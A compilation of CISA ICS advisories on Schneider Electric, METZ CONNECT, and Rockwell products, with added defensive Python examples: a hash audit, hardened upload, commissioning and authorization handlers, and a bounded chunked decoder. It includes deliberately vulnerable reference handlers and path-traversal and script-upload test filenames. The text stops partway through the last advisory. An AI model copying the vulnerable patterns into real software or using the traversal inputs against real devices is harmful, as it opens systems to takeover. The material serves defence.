
Schneider Electric EcoStruxure Machine SCADA Expert & Pro-face BLUE Open Studio

View CSAF

1. EXECUTIVE SUMMARY

  • CVSS v4 8.3
  • ATTENTION: Low Attack Complexity
  • Vendor: Schneider Electric
  • Equipment: EcoStruxure Machine SCADA Expert & Pro-face BLUE Open Studio
  • Vulnerability: Use of a Broken or Risky Cryptographic Algorithm

2. RISK EVALUATION

Successful exploitation of this vulnerability could lead to loss of confidentiality and integrity.

3. TECHNICAL DETAILS

3.1 AFFECTED PRODUCTS

Schneider Electric reports that the following products use an affected AVEVA component:

  • EcoStruxure Machine SCADA Expert: Versions prior to 2023.1 Patch 1
  • Pro-face BLUE Open Studio: Versions prior to 2023.1 Patch 1

3.2 VULNERABILITY OVERVIEW

3.2.1 Use of a Broken or Risky Cryptographic Algorithm CWE-327

The vulnerability disclosed by AVEVA Group Limited impacts the affected Schneider Electric software. Additional information can be found in the AVEVA advisory AVEVA-2025-006. The vulnerability, if exploited, could allow an attacker with read access to Edge project files or Edge offline cache files to reverse engineer Edge users’ app-native or Active Directory passwords through computational brute-forcing of weak hashes.
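The weak-hash problem described above, as an added example that is not part of the advisory or of any AVEVA or Schneider Electric code: a small audit that classifies the stored hash of every account in an exported user table and shows the salted, iterated PBKDF2 record accounts should be migrated to. The file format, account names and digests are constructed assumptions. A defender would run this kind of audit over project exports after patching to find accounts that still need a password reset, since an existing unsalted digest cannot be rehashed without the plaintext.

```python
"""Audit stored credential hashes in an exported project file and show the
salted, iterated form they should be migrated to.

Added example, not code from the advisory, AVEVA or Schneider Electric. The
file format is an assumption: one "user=stored_hash" line per account, where
the stored value is either a bare hex digest (an unsalted MD5/SHA-1 style
hash of the kind the advisory calls weak) or a PBKDF2 record of the form
pbkdf2_sha256$<iterations>$<salt_hex>$<digest_hex>.
"""
import hashlib
import hmac
import os
import re

# Hex-digest lengths of fast, unsalted hashes: cheap to brute-force offline.
WEAK_DIGEST_LENGTHS = {32: "md5", 40: "sha1", 64: "sha256-unsalted"}
PBKDF2_RE = re.compile(r"^pbkdf2_sha256\$(\d+)\$([0-9a-f]+)\$([0-9a-f]+)$")
MIN_ITERATIONS = 600_000  # OWASP's current floor for PBKDF2-HMAC-SHA256

# Constructed sample: two accounts with unsalted digests, one already migrated.
SAMPLE_PROJECT = """\
# constructed user table (format is an assumption, not the real project file)
operator=0123456789abcdef0123456789abcdef
engineer=0123456789abcdef0123456789abcdef01234567
admin=pbkdf2_sha256$600000$a1b2c3d4e5f60718$deadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeef
"""


def parse_project(text):
    """Return {user: stored_hash} from the assumed "user=hash" line format."""
    users = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        name, _, stored = line.partition("=")
        users[name.strip()] = stored.strip()
    return users


def classify_hash(stored):
    """Label a stored value: weak digest, PBKDF2 (ok / too few rounds), or unknown."""
    m = PBKDF2_RE.match(stored)
    if m:
        return "pbkdf2:ok" if int(m.group(1)) >= MIN_ITERATIONS else "pbkdf2:low-iterations"
    if re.fullmatch(r"[0-9a-fA-F]+", stored) and len(stored) in WEAK_DIGEST_LENGTHS:
        return "weak:" + WEAK_DIGEST_LENGTHS[len(stored)]
    return "unknown"


def audit(text):
    return {user: classify_hash(h) for user, h in parse_project(text).items()}


def make_pbkdf2(password, iterations=MIN_ITERATIONS, salt=None):
    """Build the record a migrated account should hold: random salt, many rounds."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_pbkdf2(record, password):
    m = PBKDF2_RE.match(record)
    if not m:
        return False
    iterations, salt, expected = int(m.group(1)), bytes.fromhex(m.group(2)), bytes.fromhex(m.group(3))
    actual = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return hmac.compare_digest(actual, expected)  # constant-time comparison


if __name__ == "__main__":
    for user, verdict in audit(SAMPLE_PROJECT).items():
        print(f"{user:10s} {verdict}")
```

Accounts reported as `weak:*` need a password reset on the patched version; the classification by digest length is a heuristic for the constructed format and would be replaced by the real file's own field markers.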

CVE-2025-9317 has been assigned to this vulnerability. A CVSS v3.1 base score of 8.4 has been calculated; the CVSS vector string is (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N).

A CVSS v4 score has also been calculated for CVE-2025-9317. A base score of 8.3 has been calculated; the CVSS vector string is (CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:H/SA:N).

3.3 BACKGROUND

  • CRITICAL INFRASTRUCTURE SECTORS: Commercial Facilities, Critical Manufacturing, Energy
  • COUNTRIES/AREAS DEPLOYED: Worldwide
  • COMPANY HEADQUARTERS LOCATION: France

3.4 RESEARCHER

Schneider Electric reported this vulnerability to CISA.

4. MITIGATIONS

Schneider Electric has identified the following specific remediations users can apply to reduce risk:

  • Version 2023.1 Patch 1 of EcoStruxure Machine SCADA Expert includes a fix for this vulnerability and is available for download. For additional details please refer to the supplied readme help file in Version 2023.1 Patch 1.
  • Version 2023.1 Patch 1 of Pro-face BLUE Open Studio includes a fix for this vulnerability and is available for download. For additional details please refer to the supplied release notes file in Version 2023.1 Patch 1.

If users choose not to apply the remediations provided above, they should immediately apply the following mitigations to reduce the risk of exploitation:

  • Access control lists should be applied to all folders where users will save and load project files.
  • Maintain a trusted chain-of-custody on project files during creation, modification, distribution, backup, and use.
  • Apply data-protection at the project level with a strong master password. For step-by-step configuration instructions, refer to “Technical Reference Manual” > Project Overview > Configuring Additional Project Settings > Options Tab > Data Protection.
  • If passwords are being used as function parameters inside project documents (such as scripts or worksheets), it is recommended to remove those passwords and use project tags instead. For more information on tags refer to “Technical Reference Manual” > Tags and the Tag Database > About Tags and the Project Database.

For more information see the associated Schneider Electric security advisory SEVD-2025-315-02 EcoStruxure Machine SCADA Expert & Pro-face BLUE Open Studio – PDF Version
The CSAF version is available here.

Schneider Electric strongly recommends the following industry cybersecurity best practices:

  • Locate control and safety system networks and remote devices behind firewalls and isolate them from the business network.
  • Install physical controls so no unauthorized personnel can access industrial control and safety systems, components, peripheral equipment, and networks.
  • Place all controllers in locked cabinets and never leave them in the “Program” mode.
  • Never connect programming software to any network other than the network intended for that device.
  • Scan all methods of mobile data exchange with the isolated network such as CDs, USB drives, etc. before use in the terminals or any node connected to these networks.
  • Never allow mobile devices that have connected to any other network besides the intended network to connect to the safety or control networks without proper sanitation.
  • Minimize network exposure for all control system devices and systems and ensure that they are not accessible from the Internet.
  • When remote access is required, use secure methods, such as virtual private networks (VPNs). Recognize that VPNs may have vulnerabilities and should be updated to the most current version available. Also, understand that VPNs are only as secure as the connected devices.
  • For more information, refer to the Schneider Electric Recommended Cybersecurity Best Practices document.

CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.

Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies.

Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time. This vulnerability is not exploitable remotely.

5. UPDATE HISTORY

  • November 18, 2025: Initial Republication of Schneider Electric SEVD-2025-315-02

METZ CONNECT EWIO2

View CSAF

1. EXECUTIVE SUMMARY

  • CVSS v4 9.3
  • ATTENTION: Exploitable remotely/low attack complexity
  • Vendor: METZ CONNECT
  • Equipment: EWIO2
  • Vulnerabilities: Authentication Bypass by Primary Weakness, Improper Control of Filename for Include/Require Statement in PHP Program (‘PHP Remote File Inclusion’), Unrestricted Upload of File with Dangerous Type, Path Traversal: ‘.../...//’, Improper Access Control

2. RISK EVALUATION

Successful exploitation of these vulnerabilities could allow an attacker to bypass authentication and control the device remotely or perform remote code execution.

3. TECHNICAL DETAILS

3.1 AFFECTED PRODUCTS

METZ CONNECT reports that the following products are affected:

  • METZ CONNECT Firmware (<2.2.0) installed on METZ CONNECT Hardware EWIO2-M: All versions
  • METZ CONNECT Firmware (<2.2.0) installed on METZ CONNECT Hardware EWIO2-M-BM: All versions
  • METZ CONNECT Firmware (<2.2.0) installed on METZ CONNECT Hardware EWIO2-BM: All versions

3.2 Vulnerability Overview

3.2.1 AUTHENTICATION BYPASS BY PRIMARY WEAKNESS CWE-305

The commissioning wizard on the affected devices does not validate if the device is already initialized. An unauthenticated remote attacker can construct POST requests to set root credentials.
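The missing initialization check described above, as an added example that is not METZ CONNECT code: the commissioning handler in the form the advisory describes beside one that is inert once first-time setup has completed, plus a log check a defender can run for commissioning requests that succeeded after the device was set up. The endpoint path, request shape, state object and log format are assumptions.

```python
"""Commissioning endpoint that is inert once the device has been initialized.

Added example, not METZ CONNECT code. The endpoint path, request shape, state
object and log format are assumptions; a real device would keep the
'initialized' flag in non-volatile storage.
"""


class DeviceState:
    def __init__(self):
        self.initialized = False  # would persist across reboots on a real device


def handle_commission_vulnerable(state, request, credentials):
    """Pattern the advisory describes: any POST that carries credentials is
    honoured, whether or not first-time setup already happened (CWE-305)."""
    if request["method"] != "POST":
        return 405, "method not allowed"
    credentials["root"] = request["body"]["password"]
    state.initialized = True
    return 200, "root credentials set"


def handle_commission_hardened(state, request, credentials, min_len=12):
    if request["method"] != "POST":
        return 405, "method not allowed"
    # The wizard is one-shot: after first-time setup, credential changes must go
    # through the authenticated settings API, never through this endpoint.
    if state.initialized:
        return 403, "device already commissioned"
    password = request["body"].get("password", "")
    if len(password) < min_len:
        return 400, f"password must be at least {min_len} characters"
    credentials["root"] = password
    state.initialized = True
    return 200, "root credentials set"


# Constructed access-log lines: "<iso-timestamp> <client> <method> <path> <status>"
SAMPLE_ACCESS_LOG = [
    "2025-11-18T08:00:01Z 192.0.2.10 POST /wizard/commission 200",
    "2025-11-18T09:15:42Z 192.0.2.10 GET /status 200",
    "2025-11-18T21:03:07Z 198.51.100.7 POST /wizard/commission 200",
]


def flag_late_commissioning(log_lines, commissioned_at, path="/wizard/commission"):
    """Return successful commissioning POSTs recorded after first-time setup.
    On an unpatched device such entries mean root credentials were reset;
    on a patched one they should never carry status 200."""
    hits = []
    for line in log_lines:
        ts, _client, method, req_path, status = line.split()
        if method == "POST" and req_path == path and status == "200" and ts > commissioned_at:
            hits.append(line)
    return hits


if __name__ == "__main__":
    state, creds = DeviceState(), {}
    first = {"method": "POST", "body": {"password": "constructed-initial-pw"}}
    later = {"method": "POST", "body": {"password": "later-unauthenticated-pw"}}
    print(handle_commission_hardened(state, first, creds))
    print(handle_commission_hardened(state, later, creds))
    print(flag_late_commissioning(SAMPLE_ACCESS_LOG, "2025-11-18T08:00:01Z"))
```

The state flag is the whole fix: the hardened handler refuses with 403 before it even looks at the submitted credentials, and the log check gives an operator a way to tell whether a device that ran the unpatched firmware ever had its root credentials reset after commissioning.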

CVE-2025-41733 has been assigned to this vulnerability. A CVSS v3.1 base score of 9.8 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

A CVSS v4 score has also been calculated for CVE-2025-41733. A base score of 9.3 has been calculated; the CVSS vector string is (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N).

3.2.2 IMPROPER CONTROL OF FILENAME FOR INCLUDE/REQUIRE STATEMENT IN PHP PROGRAM (‘PHP REMOTE FILE INCLUSION’) CWE-98

An unauthenticated remote attacker can execute arbitrary PHP files and gain full access of the affected devices.

CVE-2025-41734 has been assigned to this vulnerability. A CVSS v3.1 base score of 9.8 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

A CVSS v4 score has also been calculated for CVE-2025-41734. A base score of 9.3 has been calculated; the CVSS vector string is (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N).

3.2.3 UNRESTRICTED UPLOAD OF FILE WITH DANGEROUS TYPE CWE-434

A low-privileged remote attacker can upload any file to an arbitrary location because of a missing file check, resulting in remote code execution.

CVE-2025-41735 has been assigned to this vulnerability. A CVSS v3.1 base score of 8.8 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H).

A CVSS v4 score has also been calculated for CVE-2025-41735. A base score of 8.7 has been calculated; the CVSS vector string is (CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N).

3.2.4 PATH TRAVERSAL: ‘.../...//’ CWE-35

A low-privileged remote attacker can upload a new Python script or overwrite an existing one by using path traversal in the target filename handled by the PHP code, resulting in remote code execution.
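The two upload findings above (3.2.3, any file type to any location; 3.2.4, traversal in the target filename) share one root cause, so one added example covers both. It is not METZ CONNECT code: the unchecked join the findings describe is shown beside a handler that pins every upload under one directory, allows only data file types and never overwrites an existing file. The upload directory, the allowed extensions and the request shape are assumptions.

```python
"""Upload handler that keeps every file inside one directory, allows only
data file types and never overwrites an existing file.

Added example, not METZ CONNECT code; the upload directory, the allowed
extensions and the request shape are assumptions.
"""
import os
import pathlib

UPLOAD_ROOT = pathlib.Path("/var/lib/device/uploads")  # assumed location
ALLOWED_SUFFIXES = {".csv", ".json", ".txt"}           # data only: no .php/.py


class UploadRejected(ValueError):
    pass


def resolve_target_vulnerable(filename, root=UPLOAD_ROOT):
    """Pattern behind the CWE-434/CWE-35 findings: the client-chosen name is
    joined onto the upload directory unchecked, so '..' segments leave the
    directory and any extension, including interpreter scripts, is accepted."""
    return root / filename


def resolve_target_hardened(filename, root=UPLOAD_ROOT, allowed=ALLOWED_SUFFIXES):
    # 1. No directory separators at all: the client names a file, not a path.
    if "/" in filename or "\\" in filename or "\x00" in filename:
        raise UploadRejected("file name must not contain path separators")
    name = pathlib.PurePosixPath(filename).name
    if name in ("", ".", ".."):
        raise UploadRejected("invalid file name")
    # 2. Allowlist the extension and refuse double extensions (x.php.csv).
    suffixes = [s.lower() for s in pathlib.PurePosixPath(name).suffixes]
    if len(suffixes) != 1 or suffixes[0] not in allowed:
        raise UploadRejected(f"file type not allowed: {name}")
    # 3. Defence in depth: normalise and prove the result is still under root.
    target = pathlib.Path(os.path.normpath(root / name))
    if root not in target.parents:
        raise UploadRejected("path escapes upload directory")
    return target


def save_upload(filename, data, root=UPLOAD_ROOT):
    target = resolve_target_hardened(filename, root)
    root.mkdir(parents=True, exist_ok=True)
    # "x": create only. An existing file (for example a deployed script) is
    # never silently replaced by an upload.
    with open(target, "xb") as f:
        f.write(data)
    return target


if __name__ == "__main__":
    for candidate in ("report.csv", "../../opt/app/handler.py", "shell.php", "x.php.csv"):
        try:
            print(candidate, "->", resolve_target_hardened(candidate))
        except UploadRejected as exc:
            print(candidate, "-> rejected:", exc)
```

Rejecting separators outright, rather than stripping them, is deliberate: a client that sends a path is either misconfigured or probing, and either case is worth a 4xx and a log line rather than a silently relocated file.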

CVE-2025-41736 has been assigned to this vulnerability. A CVSS v3.1 base score of 8.8 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H).

A CVSS v4 score has also been calculated for CVE-2025-41736. A base score of 8.7 has been calculated; the CVSS vector string is (CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N).

3.2.5 IMPROPER ACCESS CONTROL CWE-284

Due to a webserver misconfiguration, an unauthenticated remote attacker is able to read the source of PHP modules.

CVE-2025-41737 has been assigned to this vulnerability. A CVSS v3.1 base score of 7.5 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).

A CVSS v4 score has also been calculated for CVE-2025-41737. A base score of 8.7 has been calculated; the CVSS vector string is (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N).

3.3 BACKGROUND

  • CRITICAL INFRASTRUCTURE SECTORS: Critical Manufacturing
  • COUNTRIES/AREAS DEPLOYED: Worldwide
  • COMPANY HEADQUARTERS LOCATION: Germany

3.4 RESEARCHER

Noam Moshe and Tomer Goldschmidt of Claroty Team82 reported these vulnerabilities to CISA.

4. MITIGATIONS

METZ CONNECT has identified the following specific workarounds and mitigations users can apply to reduce risk:

  • (Product Group: METZ CONNECT Firmware (<2.2.0) installed on METZ CONNECT Hardware EWIO2-M(All versions), METZ CONNECT Firmware (<2.2.0) installed on METZ CONNECT Hardware EWIO2-M-BM(All versions), METZ CONNECT Firmware (<2.2.0) installed on METZ CONNECT Hardware EWIO2-BM(All versions)): METZ CONNECT has released a new SW-Version 2.2.0. Install version 2.2.0 or later to remediate this vulnerability. Schedule the update at your next maintenance window. No workaround offers equivalent protection.

The following product versions have been fixed:

  • Firmware 2.2.0 installed on Energy-Controlling EWIO2-M is a fixed version for CVE-2025-41733
  • Firmware 2.2.0 installed on Energy-Controlling EWIO2-M-BM is a fixed version for CVE-2025-41733
  • Firmware 2.2.0 installed on Ethernet-IO EWIO2-BM is a fixed version for CVE-2025-41733
  • Firmware 2.2.0 installed on Energy-Controlling EWIO2-M is a fixed version for CVE-2025-41734
  • Firmware 2.2.0 installed on Energy-Controlling EWIO2-M-BM is a fixed version for CVE-2025-41734
  • Firmware 2.2.0 installed on Ethernet-IO EWIO2-BM is a fixed version for CVE-2025-41734
  • Firmware 2.2.0 installed on Energy-Controlling EWIO2-M is a fixed version for CVE-2025-41735
  • Firmware 2.2.0 installed on Energy-Controlling EWIO2-M-BM is a fixed version for CVE-2025-41735
  • Firmware 2.2.0 installed on Ethernet-IO EWIO2-BM is a fixed version for CVE-2025-41735
  • Firmware 2.2.0 installed on Energy-Controlling EWIO2-M is a fixed version for CVE-2025-41736
  • Firmware 2.2.0 installed on Energy-Controlling EWIO2-M-BM is a fixed version for CVE-2025-41736
  • Firmware 2.2.0 installed on Ethernet-IO EWIO2-BM is a fixed version for CVE-2025-41736
  • Firmware 2.2.0 installed on Energy-Controlling EWIO2-M is a fixed version for CVE-2025-41737
  • Firmware 2.2.0 installed on Energy-Controlling EWIO2-M-BM is a fixed version for CVE-2025-41737
  • Firmware 2.2.0 installed on Ethernet-IO EWIO2-BM is a fixed version for CVE-2025-41737

For more information see the associated METZ CONNECT GmbH security advisory VDE-2025-097: Metz: Config API – Authentication bypass leads to admin takeover in EWIO2 series, available in HTML and CSAF.

CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities, such as:

  • Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet.
  • Locate control system networks and remote devices behind firewalls and isolate them from business networks.
  • When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs). Recognize VPNs may have vulnerabilities, should be updated to the most recent version available, and are only as secure as the connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.

Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies.

Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

CISA also recommends users take the following measures to protect themselves from social engineering attacks:

No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time.

5. UPDATE HISTORY

  • November 18, 2025: Initial Publication

Rockwell Automation Verve Asset Manager

View CSAF

1. EXECUTIVE SUMMARY

  • CVSS v4 8.4
  • ATTENTION: Exploitable remotely/low attack complexity
  • Vendor: Rockwell Automation
  • Equipment: Verve Asset Manager
  • Vulnerability: Incorrect Authorization

2. RISK EVALUATION

Successful exploitation of this vulnerability could result in an attacker accessing or altering user data.

3. TECHNICAL DETAILS

3.1 AFFECTED PRODUCTS

The following versions of Verve Asset Manager, an OT cybersecurity platform, are affected:

  • Verve Asset Manager: Version 1.33
  • Verve Asset Manager: Version 1.34
  • Verve Asset Manager: Version 1.35
  • Verve Asset Manager: Version 1.36
  • Verve Asset Manager: Version 1.37
  • Verve Asset Manager: Version 1.38
  • Verve Asset Manager: Version 1.39
  • Verve Asset Manager: Version 1.40
  • Verve Asset Manager: Version 1.41
  • Verve Asset Manager: Version 1.41.1
  • Verve Asset Manager: Version 1.41.2
  • Verve Asset Manager: Version 1.41.3

3.2 VULNERABILITY OVERVIEW

3.2.1 INCORRECT AUTHORIZATION CWE-863

A security issue was discovered within Verve Asset Manager allowing unauthorized read-only users to read, update, and delete users via the API.
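The incorrect-authorization class described above, as an added example that is not Rockwell Automation or Verve Asset Manager code: an API where being logged in is the only gate, beside one that checks every action against a deny-by-default permission matrix, plus an audit-log scan for successful calls that a recorded role should not have been allowed. The role names, permission matrix, endpoint paths and log format are assumptions.

```python
"""Deny-by-default authorization for a user-management API, checked per
action rather than only at login (CWE-863).

Added example, not Rockwell Automation or Verve Asset Manager code; the role
names, the permission matrix, the endpoint paths and the audit-log format are
assumptions.
"""
from dataclasses import dataclass


@dataclass
class Principal:
    name: str
    role: str  # assumed roles: "admin", "operator", "readonly"


# action -> roles allowed to perform it; anything absent is denied.
PERMISSIONS = {
    "users:list":   {"admin", "operator", "readonly"},
    "users:read":   {"admin", "operator", "readonly"},
    "users:update": {"admin"},
    "users:delete": {"admin"},
}


class Forbidden(PermissionError):
    pass


def authorize(principal, action):
    """The single check every handler must pass before touching data."""
    if principal is None or principal.role not in PERMISSIONS.get(action, set()):
        who = "anonymous" if principal is None else f"{principal.name} ({principal.role})"
        raise Forbidden(f"{who} may not {action}")


class UserApiVulnerable:
    """Authentication is the only gate: a read-only account that is logged in
    reaches update and delete exactly like an administrator."""
    def __init__(self, users):
        self.users = dict(users)

    def delete_user(self, caller, username):
        if caller is None:
            raise PermissionError("login required")
        del self.users[username]


class UserApiHardened:
    def __init__(self, users):
        self.users = dict(users)

    def list_users(self, caller):
        authorize(caller, "users:list")
        return sorted(self.users)

    def update_user(self, caller, username, **changes):
        authorize(caller, "users:update")
        self.users[username] = {**self.users[username], **changes}
        return self.users[username]

    def delete_user(self, caller, username):
        authorize(caller, "users:delete")
        del self.users[username]


# Constructed audit-log lines: "<ts> user=<name> role=<role> <method> <path> <status>"
SAMPLE_AUDIT_LOG = [
    "2025-11-13T10:02:11Z user=alice role=readonly DELETE /api/users/bob 200",
    "2025-11-13T10:05:40Z user=carol role=admin PUT /api/users/bob 200",
    "2025-11-13T10:07:03Z user=alice role=readonly GET /api/users/bob 200",
]
METHOD_ACTION = {"GET": "users:read", "PUT": "users:update",
                 "PATCH": "users:update", "DELETE": "users:delete"}


def find_privilege_violations(lines):
    """Successful (200) calls whose recorded role is not allowed the action:
    on an unpatched version these are the incorrect-authorization events."""
    hits = []
    for line in lines:
        _ts, _user_kv, role_kv, method, _path, status = line.split()
        role = role_kv.split("=", 1)[1]
        action = METHOD_ACTION.get(method)
        if action and status == "200" and role not in PERMISSIONS.get(action, set()):
            hits.append(line)
    return hits
```

The log scan is the useful part for anyone who ran an affected version: a read-only principal with a 200 on a mutating method is exactly the event to look for before the upgrade to 1.41.4 or 1.42 closes the gap.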

CVE-2025-11862 has been assigned to this vulnerability. A CVSS v3 base score of 9.9 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:H/A:H).

A CVSS v4 score has also been calculated for CVE-2025-11862. A base score of 8.4 has been calculated; the CVSS vector string is (AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:H/VA:H/SC:N/SI:L/SA:H).

3.3 BACKGROUND

  • CRITICAL INFRASTRUCTURE SECTORS: Critical Manufacturing
  • COUNTRIES/AREAS DEPLOYED: Worldwide
  • COMPANY HEADQUARTERS LOCATION: United States

3.4 RESEARCHER

Rockwell Automation reported this vulnerability to CISA.

4. MITIGATIONS

Rockwell Automation has addressed this issue in version 1.41.4 and 1.42. Rockwell Automation encourages users to update to the newest available version.

For more information about this issue, see the advisory on the Rockwell Automation security page.

Users with additional questions can contact Rockwell Automation TechConnect for help.

CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability, such as:

  • Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet.
  • Locate control system networks and remote devices behind firewalls and isolate them from business networks.
  • When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize a VPN is only as secure as the connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.

Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies.

Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time.

5. UPDATE HISTORY

  • November 13, 2025: Initial Republication of Rockwell Automation advisory ‘Verve Asset Manager Access Control Vulnerability’

Rockwell Automation FactoryTalk Policy Manager

View CSAF

1. EXECUTIVE SUMMARY

  • CVSS v4 8.7
  • ATTENTION: Exploitable remotely/low attack complexity
  • Vendor: Rockwell Automation
  • Equipment: FactoryTalk Policy Manager
  • Vulnerability: Improper Resource Shutdown or Release

2. RISK EVALUATION

Successful exploitation of this vulnerability could lead to resource exhaustion and denial of service.

3. TECHNICAL DETAILS

3.1 AFFECTED PRODUCTS

Rockwell Automation reports that the following versions of FactoryTalk Policy Manager, a software tool that enables OT teams to design, deploy, and manage system-wide security policies using CIP Security and OPC UA standards, are affected:

  • FactoryTalk Policy Manager: Versions 6.51.00 and prior

3.2 VULNERABILITY OVERVIEW

3.2.1 Improper Resource Shutdown or Release CWE-404

A vulnerability in Node.js HTTP servers may allow an attacker to send a specially crafted HTTP request with chunked encoding, which can lead to resource exhaustion and denial of service. The server reads an unbounded number of bytes from a single connection, exploiting the lack of limitations on chunk extension bytes. This issue can cause CPU and network bandwidth exhaustion, bypassing standard safeguards like timeouts and body size limits.
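The unbounded quantity described above is the chunk-extension bytes of the chunked transfer coding. The following is an added example, not Node.js or llhttp code: a decoder that accumulates extension bytes across the whole message and rejects the request once they exceed a budget, alongside the usual body-size cap. The 16 KiB extension cap and 1 MiB body cap are assumed values, not those of any product.

```python
"""Chunked transfer-coding decoder that bounds chunk-extension bytes, which is
the unbounded quantity behind CVE-2024-22019.

Added example in Python, not Node.js or llhttp code; the 16 KiB extension cap
and 1 MiB body cap are assumed values, not those of any product.
"""
import re


class ChunkedError(ValueError):
    pass


MAX_EXTENSION_BYTES = 16 * 1024
MAX_BODY_BYTES = 1024 * 1024
CHUNK_SIZE_RE = re.compile(rb"^[0-9A-Fa-f]{1,16}$")


def decode_chunked(data, max_ext=MAX_EXTENSION_BYTES, max_body=MAX_BODY_BYTES):
    """Decode a complete chunked body (RFC 9112 section 7.1).
    Returns (body, extension_bytes_seen); raises ChunkedError on malformed
    input or when either limit is exceeded."""
    pos, body, ext_total = 0, bytearray(), 0
    while True:
        eol = data.find(b"\r\n", pos)
        if eol < 0:
            # No line terminator yet: a line already longer than the extension
            # budget is rejected instead of being buffered indefinitely.
            if len(data) - pos > max_ext:
                raise ChunkedError("chunk-size line too long")
            raise ChunkedError("truncated chunk-size line")
        size_field, sep, ext = data[pos:eol].partition(b";")
        if sep:
            # Extensions are accumulated across the whole message: many small
            # chunks each carrying a large extension must not add up unbounded.
            ext_total += len(ext) + 1
            if ext_total > max_ext:
                raise ChunkedError("chunk extensions exceed limit")
        size_field = size_field.strip()
        if not CHUNK_SIZE_RE.match(size_field):
            raise ChunkedError("bad chunk size")
        size = int(size_field, 16)
        pos = eol + 2
        if size == 0:
            # Trailer section: zero or more header lines, then an empty line.
            while True:
                eol = data.find(b"\r\n", pos)
                if eol < 0:
                    raise ChunkedError("truncated trailers")
                if eol == pos:
                    return bytes(body), ext_total
                pos = eol + 2
        if len(body) + size > max_body:
            raise ChunkedError("body exceeds limit")
        chunk = data[pos:pos + size]
        if len(chunk) < size or data[pos + size:pos + size + 2] != b"\r\n":
            raise ChunkedError("truncated chunk data")
        body += chunk
        pos += size + 2


if __name__ == "__main__":
    print(decode_chunked(b"4\r\nWiki\r\n5\r\npedia\r\n0\r\n\r\n"))
```

A body-size limit alone does not help here: the bytes that exhaust the server never enter the body, which is why the extension counter has to be a separate budget and has to persist across chunks rather than reset per chunk.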

CVE-2024-22019 has been assigned to this vulnerability. A CVSS v3.1 base score of 7.5 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).

